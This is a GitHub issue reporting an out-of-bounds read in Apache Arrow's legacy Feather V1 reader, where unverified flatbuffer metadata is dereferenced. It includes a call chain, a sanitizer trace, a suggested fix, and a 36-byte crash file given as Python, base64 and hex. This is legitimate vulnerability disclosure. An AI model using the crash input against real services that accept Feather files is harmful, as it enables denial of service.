OwenSanzas opened a new issue, #50229:
URL: https://github.com/apache/arrow/issues/50229

   
   ## Summary
   
   Opening a crafted Feather **V1** file through the public
   `arrow::ipc::feather::Reader::Open` API triggers an AddressSanitizer
   heap-buffer-overflow (out-of-bounds read) inside Arrow's legacy Feather V1
   metadata parsing. The reader calls `fbs::GetCTable` on the trailing metadata
   flatbuffer **without first running a `flatbuffers::Verifier`**, then
   dereferences attacker-controlled offsets in `ReaderV1::ReadSchema`
   (`cpp/src/arrow/ipc/feather.cc:178`) before any `Status` error can be
   returned. A 36-byte file with the `FEA1` magic and a corrupt footer triggers
   the crash deterministically, so any service that ingests untrusted Feather V1
   files can be crashed (denial of service).
   
   Tested at pinned commit `16fe34250a2ef261790b9cc414fdf0831669cf9f`
   (25.0.0-SNAPSHOT).
   
   ## Root Cause
   
   `ReaderV1::Open` reads the trailing metadata flatbuffer and obtains a typed
   view of it via `fbs::GetCTable(...)`. A flatbuffer obtained this way is
   **untrusted**: its vtable, field offsets, and vector lengths are
   attacker-controlled bytes. The flatbuffers contract requires a caller to run
   a `flatbuffers::Verifier` over the buffer before touching any generated
   accessor; only verification guarantees that every offset stays inside the
   buffer.
   
   `ReaderV1::Open` skips that step. It goes straight from `GetCTable` to
   `ReadSchema()`, which dereferences `metadata_->columns()` on the unverified
   table. `columns()` is a flatbuffers `GetPointer` that reads the vtable and an
   offset field; with a corrupt offset, `flatbuffers::ReadScalar` reads past the
   end of the metadata buffer.
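
As a rough illustration of why unverified offsets are dangerous, the Python sketch below mimics the first steps a generated accessor takes (read the root offset, then follow the table's pointer to its vtable) and reports the first read that would land outside the buffer. It is a simplified model of the flatbuffers wire layout, not Arrow or flatbuffers code, and `first_out_of_bounds_read` is a hypothetical helper name.

```python
import struct


def first_out_of_bounds_read(buf: bytes):
    """Follow root offset -> table -> vtable as an accessor would.

    Returns (description, position) for the first read that does not fit
    inside buf, or None if every read in this short walk stays in bounds.
    """
    def fits(pos: int, size: int) -> bool:
        return 0 <= pos and pos + size <= len(buf)

    if not fits(0, 4):
        return ("root offset", 0)
    (table,) = struct.unpack_from("<I", buf, 0)        # uoffset_t to the root table
    if not fits(table, 4):
        return ("table soffset", table)
    (soffset,) = struct.unpack_from("<i", buf, table)  # signed offset back to the vtable
    vtable = table - soffset
    if not fits(vtable, 2):
        return ("vtable size", vtable)
    return None


# An empty metadata region: even the 4-byte root offset is out of bounds.
print(first_out_of_bounds_read(b""))            # ('root offset', 0)
# All-0xff bytes: the root offset decodes to 4294967295, far past the buffer.
print(first_out_of_bounds_read(b"\xff" * 24))   # ('table soffset', 4294967295)
```

In Python the bad read is merely reported. Unchecked C++ code performs the read at that address, which is what AddressSanitizer flags.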
   
   Vulnerable code (`cpp/src/arrow/ipc/feather.cc:172`):
   
   ```cpp
       metadata_ = fbs::GetCTable(metadata_buffer_->data());   // no flatbuffers::Verifier
       return ReadSchema();
     }
   
     Status ReadSchema() {
       std::vector<std::shared_ptr<Field>> fields;
       for (int i = 0; i < static_cast<int>(metadata_->columns()->size()); ++i) {  // line 178: deref unverified flatbuffer
         const fbs::Column* col = metadata_->columns()->Get(i);
         std::shared_ptr<DataType> type;
         RETURN_NOT_OK(
             GetDataType(col->values(), col->metadata_type(), col->metadata(), &type));
         fields.push_back(::arrow::field(col->name()->str(), type));
       }
   ```
   
   Call chain (attacker bytes -> fault):
   
   ```
   arrow::ipc::feather::Reader::Open          feather.cc:773 / :794  (public API)
     -> ReaderV1::Open                        feather.cc:173
          metadata_ = fbs::GetCTable(...)      feather.cc:172   <- NO flatbuffers::Verifier
        -> ReaderV1::ReadSchema               feather.cc:178
             metadata_->columns()->size()  -> fbs::CTable::columns()  feather_generated.h:698
               -> flatbuffers::Table::GetVTable
                 -> flatbuffers::ReadScalar   base.h:440   <- OOB read
   ```
   
   The metadata buffer is sized to the file's declared `metadata_length`; the
   corrupt offset points past that region, so the accessor reads out of bounds.
   Arrow's own threat model (`docs/source/cpp/security.rst`, "Ingesting
   untrusted data") states the IPC reader APIs must return an `arrow::Status`
   error on malformed input. The V1 reader violates that contract: it crashes
   before it can return a `Status`.
   
   ## PoC
   
   A 36-byte malformed Feather V1 file: the `FEA1` magic header, 24 bytes of
   `0xff` filler, a `metadata_length` of 0, and the trailing `FEA1` magic.
   `Reader::Open` selects the legacy V1 path on the `FEA1` magic, then
   `GetCTable` builds a table over an empty/short metadata region and
   `columns()` reads out of bounds.
   
   ```python
   # generate_poc.py — re-create the shipped 36-byte crash input
   poc = (b"FEA1"          # leading magic
          + b"\xff" * 24    # corrupt footer body
          + b"\x00\x00\x00\x00"  # metadata_length = 0
          + b"FEA1")        # trailing magic
   with open("poc.bin", "wb") as f:  # close the file deterministically
       f.write(poc)
   assert len(poc) == 36
   ```
   
   Crash input size: 36 bytes (`poc/poc.bin`, md5 `9d96bcc065b6672396fed18492792d03`).
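
To make the PoC layout concrete, the sketch below decodes the footer by hand and shows which metadata bytes the reader ends up with. It assumes the footer is a 4-byte little-endian `metadata_length` followed by the 4-byte trailing magic (so `FOOTER_SIZE = 8`), which matches the PoC layout and the `size - footer_size - metadata_length` read in the suggested fix. `split_feather_v1` is a hypothetical helper, not an Arrow API.

```python
import struct

MAGIC = b"FEA1"
FOOTER_SIZE = 8  # assumption: uint32 metadata_length + 4-byte trailing magic


def split_feather_v1(data: bytes):
    """Return (metadata_length, metadata_bytes) for a Feather V1 file image."""
    if len(data) < len(MAGIC) + FOOTER_SIZE:
        raise ValueError("file too small to be Feather V1")
    if not (data.startswith(MAGIC) and data.endswith(MAGIC)):
        raise ValueError("missing FEA1 magic")
    # metadata_length sits immediately before the trailing magic.
    (metadata_length,) = struct.unpack_from("<I", data, len(data) - FOOTER_SIZE)
    start = len(data) - FOOTER_SIZE - metadata_length
    if start < len(MAGIC):
        raise ValueError("metadata_length exceeds file size")
    return metadata_length, data[start:start + metadata_length]


poc = b"FEA1" + b"\xff" * 24 + b"\x00\x00\x00\x00" + b"FEA1"
length, metadata = split_feather_v1(poc)
print(length, metadata)  # 0 b''
```

With a declared length of 0 the metadata region is empty, so any flatbuffer accessor applied to it has no valid bytes to read.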
   
   ## Reproduction
   
   Build Arrow C++ from source with `-DARROW_IPC=ON` and AddressSanitizer, then
   open the attached Feather V1 file through the public reader API:
   
   ```cpp
   #include <arrow/ipc/feather.h>
   #include <arrow/io/memory.h>
   // auto buf = ...read poc.bin...;
   auto source = std::make_shared<arrow::io::BufferReader>(buf);
   std::shared_ptr<arrow::ipc::feather::Reader> reader;
   auto st = arrow::ipc::feather::Reader::Open(source).Value(&reader);   // OOB read here
   ```
   
   `ReaderV1::Open` does `metadata_ = fbs::GetCTable(metadata_buffer_->data())`
   with **no `flatbuffers::Verifier`** over the metadata, then `ReadSchema()`
   dereferences `metadata_->columns()` on the unverified flatbuffer:
   
   ```
   AddressSanitizer: heap-buffer-overflow READ
     #0 flatbuffers::ReadScalar<...>            base.h
     #1 arrow::ipc::feather::fbs::CTable::columns()  feather_generated.h
     #2 ReaderV1::ReadSchema / ReaderV1::Open   ipc/feather.cc
   ```
   
   The unverified `GetCTable` + `columns()` deref is still present in current
   `master` (`cpp/src/arrow/ipc/feather.cc:172`).
   PoC: 36-byte `.feather` file (recreate from the base64 below).
   
   ## Suggested Fix
   
   Run a `flatbuffers::Verifier` over the metadata buffer before calling
   `fbs::GetCTable` / dereferencing any accessor, returning `Status::Invalid` on
   failure — matching how the V2/IPC reader rejects malformed metadata:
   
   ```diff
      ARROW_ASSIGN_OR_RAISE(metadata_buffer_,
                            source->ReadAt(size - footer_size - metadata_length,
                                           metadata_length, /*allow_short_read=*/false));
   
   -  metadata_ = fbs::GetCTable(metadata_buffer_->data());
   +  flatbuffers::Verifier verifier(metadata_buffer_->data(),
   +                                 metadata_buffer_->size());
   +  if (!fbs::VerifyCTableBuffer(verifier)) {
   +    return Status::Invalid("Feather V1 metadata failed flatbuffer verification");
   +  }
   +  metadata_ = fbs::GetCTable(metadata_buffer_->data());
      return ReadSchema();
   ```
   
   (The exact verifier symbol depends on the generated `feather_generated.h`;
   the principle is "verify before accessing", and the precise call is the
   upstream maintainer's judgement.)
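
The "verify before accessing" principle can be sketched in Python as a bounds check on every step between the buffer start and a vector field, raising an error (the analogue of returning `Status::Invalid`) instead of reading. This is a deliberately tiny model: the real `flatbuffers::Verifier` checks much more (alignment, nested tables, strings, depth limits). `checked_vector_length` and its `field_index` parameter are hypothetical names for illustration only.

```python
import struct


def checked_vector_length(buf: bytes, field_index: int) -> int:
    """Return the length of the vector stored in the root table's given field,
    raising ValueError if any offset on the way leaves the buffer."""
    def need(pos: int, size: int, what: str) -> None:
        if pos < 0 or pos + size > len(buf):
            raise ValueError(f"{what} out of bounds")

    need(0, 4, "root offset")
    (table,) = struct.unpack_from("<I", buf, 0)
    need(table, 4, "table")
    (soffset,) = struct.unpack_from("<i", buf, table)
    vtable = table - soffset
    need(vtable, 4, "vtable header")
    (vtable_size,) = struct.unpack_from("<H", buf, vtable)
    if vtable_size < 4:
        raise ValueError("vtable too small")
    need(vtable, vtable_size, "vtable")

    slot = 4 + 2 * field_index            # field slots follow the 4-byte vtable header
    if slot + 2 > vtable_size:
        return 0                          # field not present in this vtable
    (field_off,) = struct.unpack_from("<H", buf, vtable + slot)
    if field_off == 0:
        return 0                          # field absent
    field_pos = table + field_off
    need(field_pos, 4, "field")
    (rel,) = struct.unpack_from("<I", buf, field_pos)
    vec = field_pos + rel                 # vector offset is relative to the field
    need(vec, 4, "vector length")
    (length,) = struct.unpack_from("<I", buf, vec)
    need(vec + 4, 4 * length, "vector elements")
    return length


# Hand-built buffer: root -> table at 12, vtable at 4, one-element vector at 20.
good = struct.pack("<IHHHHiIII", 12, 6, 8, 4, 0, 8, 4, 1, 0)
print(checked_vector_length(good, 0))  # 1
```

Feeding it an empty buffer, or the same buffer with the vector length overwritten by `0xFFFFFFFF`, raises `ValueError` rather than touching bytes outside the buffer.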
   
   ## PoC bytes (self-contained)
   
   The trigger input is **36 bytes** (`poc/poc.bin`).
   Recreate it exactly with:
   
   ```bash
   base64 -d > poc.bin <<'B64'
   RkVBMf///////////////////////////////wAAAABGRUEx
   B64
   ```
   
   Hex: `46454131ffffffffffffffffffffffffffffffffffffffffffffffff0000000046454131`
   
   ## Credit
   
   Aisle Research (Ze Sheng (O2Lab & TAMU), Dmitrijs Trizna, Luigino Camastra,
   Guido Vranken).
   

